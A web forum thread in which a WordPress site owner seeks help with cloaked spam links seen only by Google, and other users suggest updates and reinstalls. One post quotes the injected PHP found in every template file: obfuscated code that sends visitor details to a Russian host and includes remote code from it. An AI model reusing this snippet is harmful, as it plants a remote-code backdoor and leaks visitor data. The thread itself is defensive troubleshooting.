I hope it is the best section to place this issue. I have something very weird going on on my all sites. They all are based on Wordpress. If you check indexed pages on one of my sites, let's say this one compare-forex.com: http://www.google.com/search?q=site:compare-forex.com you'll see some weird links there starting with "hardware inspector crack...." that leads to the home page and other articles. I tried to find it in the Source but couldn't?! The thing is that only those links were cached by Google and all other pages including homepage are not cached anymore?! So these links were somehow inserted into the site but I don't know where and how. I need urgently to remove them. Please help me Thank you Vadim
Unbale to understand your post and unbale to see those links also.Based on my assumption that some third party links are being added "inside" your content without your knowledge.It means that your wordpress account/hosting account is hacked by some one. Suggestions - Upgrade your wordpress account to the most recent version. Change your hosting control panel login and upload the new version of pages to server. If this dont solve your problem then come back to forum and explain what exactly is happening so the people like me can review/suggest the solution(s). Thanks
I have the latest version of WP, and I updated the login few days ago. Check this cached page http://209.85.129.132/search?q=cach...om/+site:compare-forex.com&hl=en&ct=clnk&cd=3 see the only cached page with spam links. I checked the source of my posta and didn't find anything weird.
Check if you find any .js file in the footer ? and also upgrade wordpress and install the bad neighborhood plugin.
SEObook.com reported this hack a while back, its a vunerability in wordpress' code. Only Google sees the link because the hack cloaks the links to everybody but google. You need to make a copy of your databases, uninstall wordpress, upgrade to the latest version and import your database backups.
The thing is that I don't see thiese links when I open some post or page, but you see them in all cached pages. Look at this site of mine: repairpcguide.com it is in my signature, check any cached page and you can see these links above the header. The site is updated to the latest version. How can I check if the "spam" script is still there if I don't see spam links normaly in the pages, not in the cached pages? Is there any spyware software to scan root folders?
I already explained, the links are cloaked. You will not see them unless you are Google or you ftp into your site and take a look in your code.
I found this script in every file of the tamplate: error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==")."bdahbzzazbzgh".base64_decode("LnVzZXJzLnBocGluY2x1ZGUucnU=")."/?".$str);} Where did it come from? This caused the trouble. Does some one understand it? Thanks, Vadim
It does look like it might have caused the problem, it looks like the spammer has gone to a lot of effort to make things difficult to understand by base_64 encoding everything. If you decode some of those string it's including code from a russian domain. Here's what to do. Make a backup and then remove this code from the templates. Reupload the modified versions back to your host. If everything still seems to work fine, you're golden and you've probably fixed the problem. If things screw up just revert to using the backup.
This is 110% WP hack immediately change your all setting of WP.If this don't solve this problem delete all wordpress files and re-install.Also make sure you have a strong passwords for database and admin.Also ask your hosting provider so that he can patch up the leakages from Hosting side(if any).
Always ensure your wordpress version remains up to date. Like with any other Open Source product, Wordpress is unfortunately prone to abuse and hacks (just like with phpbb).
What do you mean by "password for database"? I have only wp admin and cpanel password. Do you know of some software that I can scan my sites with to find whether or not there is other malicious code? Thanks, Vadim
Well for generation of pages in wordpress you need a basic database.You usually need to create a db file during installation of wordpress! No software is available to scan the wordpress files.(I am not 100% sure)